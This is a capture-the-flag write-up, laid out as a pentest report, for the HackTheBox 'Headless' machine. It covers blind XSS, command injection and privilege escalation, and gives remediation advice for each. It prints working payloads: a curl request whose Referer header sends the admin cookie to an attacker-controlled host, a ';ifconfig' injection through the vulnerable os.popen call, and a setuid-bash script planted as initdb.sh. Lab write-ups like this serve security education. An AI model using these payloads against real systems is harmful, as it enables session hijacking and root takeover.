HTB Headless CTF Writeup

Headless CTF banner
Fig. 01: HTB Headless CTF banner image

Executive Summary

Overview

The pentest conducted on the Headless CTF platform has uncovered multiple critical security vulnerabilities. These vulnerabilities span from blind Cross-Site Scripting (XSS) to Command Injection and Vertical Privilege Escalation. Each identified issue presents a significant threat to the integrity and security of the platform, potentially allowing unauthorized access, data exfiltration, and escalation of privileges.

Key Findings

Blind XSS in Support Messages

  • Severity: Elevated
  • Vulnerability: Blind XSS vulnerability was identified in the support message section, allowing attackers to execute arbitrary JavaScript in the context of the admin's session.
  • Recommendation: Implement input validation and sanitization mechanisms to prevent the execution of unauthorized scripts.

Command Injection via Dashboard

  • Severity: High
  • Vulnerability: An authenticated command injection vulnerability was found in the dashboard's "date" parameter, enabling remote code execution.
  • Recommendation: Sanitize and validate all user inputs, especially those used in system command execution contexts.

Vertical Privilege Escalation through Script Execution

  • Severity: Extreme
  • Vulnerability: A flaw was discovered that allows executing commands as root by exploiting a script (/usr/bin/syscheck) run by user dvir.
  • Recommendation: Restrict the execution context of scripts and validate the origin and integrity of executables to prevent unauthorized elevation of privileges.

Summary

The identified vulnerabilities represent a substantial risk to the Headless CTF platform. Immediate remediation is advised to mitigate potential attacks that could compromise system integrity, lead to unauthorized data access, or allow attackers to gain elevated privileges within the system. The recommendations provided aim to guide the remediation process, emphasizing the importance of thorough input validation, the principle of least privilege, and secure coding practices.

Initial Target - 10.10.11.8

Service Enumeration

IP AddressTCP Ports Open
10.10.11.822, 5000

BS01 - Blind XSS (Cross Site Scripting)

Explanation

The vulnerability identified pertains to a Blind Cross-Site Scripting (XSS) flaw located within the support messaging functionality, accessible at http://10.10.11.8:5000/support. This section is intended to allow users to communicate with the platform's support team. However, it harbors a significant security oversight. While there is a rudimentary security mechanism in place aimed at detecting and blocking submissions containing suspicious characters, such as "<" or ">", this protection is not foolproof. Triggering this protective measure results in an informative alert that the user's browser characteristics, inclusive of all HTTP headers, have been forwarded to the administrative team for further analysis.

The security flaw arises when, subsequent to activating this protective measure, an attacker embeds malicious JavaScript code within the request headers. Upon the administrative personnel reviewing the logs generated under suspicion of malicious activity, the injected script executes within the context of their session. This execution pathway enables the potential exfiltration of sensitive session cookies belonging to the administrative user, thereby compromising the integrity and confidentiality of the session.

Severity

This vulnerability is assigned an Elevated severity rating due to its potential to compromise administrative sessions and facilitate unauthorized access or further attacks against the platform.

Recommendations

Implement comprehensive input validation and sanitization on all user-submitted data to ensure that potentially harmful characters or code snippets are neutralized before processing. Also, adopt and enforce a robust Content Security Policy that specifically prohibits the execution of unauthorized or unsafe scripts within the context of the webpage, thereby mitigating the impact of XSS vulnerabilities.

Steps to Reproduce

  1. Setup a Listener: Initiate a simple HTTP server on the attacker's machine using Python with the command: python3 -m http.server 80.
  2. Send the Malicious Payload: Execute a crafted curl command designed to trigger the protective measure and inject the malicious script:
    curl -X POST --data 'fname=bsec&lname=bsec&[email protected]&phone=123456789&message=<>;' -H 'Referer: <script>new Image().src="http://YOUR-TUN0-IP/?c="+document.cookie;</script>' http://10.10.11.8:5000/support -vv
    
  3. Capture the Admin Session Cookie: Monitor the HTTP server's logs for incoming requests. The admin session cookie will be appended after the ?c= query parameter, evidencing the successful exfiltration:
    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
    10.10.11.8 - - [25/Mar/2024 14:10:15] "GET /?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1" 200 -
    
Contact form screenshot
Fig. 02: Contact Form
Screenshot showcasing the process to achieve blind XSS on HTB Headless CTF
Fig. 03: Burpsuite request, showcasing the modified "Referer" header, including the XSS payload.
Screenshot showcasing the admin cookie retrieval, for HTB Headless CTF
Fig. 04: Admin cookie retrieval

BS02 - Initial Access via Command Injection

Explanation

A critical Command Injection vulnerability was uncovered following the successful exploitation of the previously discussed Blind XSS flaw (BS01). Attackers leveraging this initial vulnerability can escalate their access to interact with the /dashboard endpoint, which is typically reserved for administrative personnel. The exploit involves the manipulation of cookie data to masquerade as the admin, thereby gaining unauthorized access to administrative functions.

The vulnerability specifically manifests when making a POST request to the /dashboard endpoint. It is observed that the application does not adequately sanitize user-supplied input in the "date" field, allowing for the injection of arbitrary commands. This oversight enables an attacker to append a command injection payload to the "date" parameter, which the server then executes without validation.

Severity

Given its potential to allow unauthorized command execution, access to sensitive information, and the ability to further compromise the system, this vulnerability is classified with a High severity rating.

Recommendations

Ensure that all user inputs, especially those that could be used in system commands, are rigorously validated and sanitized to prevent the injection of malicious payloads.

Steps to Reproduce

  1. Leverage the PoC: Utilize the Proof of Concept (PoC) developed by BehindSecurity to exploit the command injection flaw, gaining unauthorized access to the system.

Insight

The flaw resides within a Flask application route that inadequately validates user-controlled input before executing it as part of a system command. Specifically, the application checks for administrative privileges and then directly incorporates the user-supplied "date" variable into a system command, executed via os.popen. This vulnerability is exemplified in the code snippet provided, showcasing the absence of proper input validation mechanisms.

@app.route('/dashboard', methods=['GET', 'POST'])
def admin():
    if serializer.loads(request.cookies.get('is_admin')) == "user":
        return abort(401)

    script_output = ""

    if request.method == 'POST':
        date = request.form.get('date')
        if date:
            script_output = os.popen(f'bash report.sh {date}').read()

    return render_template('dashboard.html', script_output=script_output)

For instance, appending an arbitrary command such as ;ifconfig to the "date" input would result in the execution of the ifconfig command, with the output being displayed on the dashboard. This command execution occurs because the application fails to segregate user input from the command line, thereby treating the entire input string as a single command line to execute.

Unauthorized admin dashboard screenshot
Fig. 05: Unauthorized admin dashboard
Fig. 06: Admin dashboard after exploiting BS01 and changing the "is_admin" cookie value
Payload example containing command injection, using burpsuite tool
Fig. 07: Command injection payload example with burpsuite
Successful foothold on the HTB Headless CTF system
Fig. 08: Successful foothold on HTB Headless CTF

BS03 - Vertical Privilege Escalation Post-Exploitation

Explanation

The vulnerability centers around the /usr/bin/syscheck script, which is executable by the user dvir with root-level permissions. The script has a critical flaw in its operation: it searches for and executes a file named initdb.sh located in the current working directory, without verifying the file's origin or integrity.

An attacker with access to the dvir user account could exploit this vulnerability by crafting a malicious initdb.sh script in a directory where dvir possesses write permissions. By inducing the execution of this script with root privileges, the attacker can execute arbitrary commands as the root user, effectively compromising the entire system.

Severity

The gravity of this vulnerability is assessed as Extreme due to its potential to provide an attacker with unrestricted root access to the system, thereby bypassing all security mechanisms and controls.

Recommendations

Modify the /usr/bin/syscheck script to validate the path and integrity of initdb.sh before execution, ensuring that only trusted scripts are executed. Nevertheless, restrict the execution privileges of scripts and commands to the lowest level necessary for their operation, minimizing the potential impact of exploitation. Also, update scripts to use absolute paths when executing other scripts or binaries to prevent directory traversal attacks and unauthorized file execution.

Steps to Reproduce

  1. Preparation: Navigate to a writable directory, for instance, /home/dvir.
  2. Script Creation: Craft a malicious initdb.sh script within the directory. This script should contain commands intended to elevate privileges or execute arbitrary commands as root. For instance:
    #!/bin/bash
    chmod +s /bin/bash
    
  3. Permission Modification: Assign executable permissions to the malicious script to ensure its execution by the root user: chmod 777 initdb.sh
  4. Execution Trigger: Utilize sudo or equivalent privileges to execute /usr/bin/syscheck, prompting the script to search for and execute initdb.sh.
  5. Gain Root Shell: Following the successful execution of the malicious script, an attacker can leverage the modified permissions to obtain a root shell, using the command /bin/bash -p.
Screenshot showcasing root permissions for the user dvir
Fig. 09: Sudo permissions for the user "dvir"
Showcasing the "syscheck" script
Fig. 10: "syscheck" script
Screenshot showcasing root privesc for HTB Headless CTF
Fig. 11: Root privesc

Conclusion – HTB Headless CTF

We hope you have found our content on HTB Headless CTF useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Scroll to Top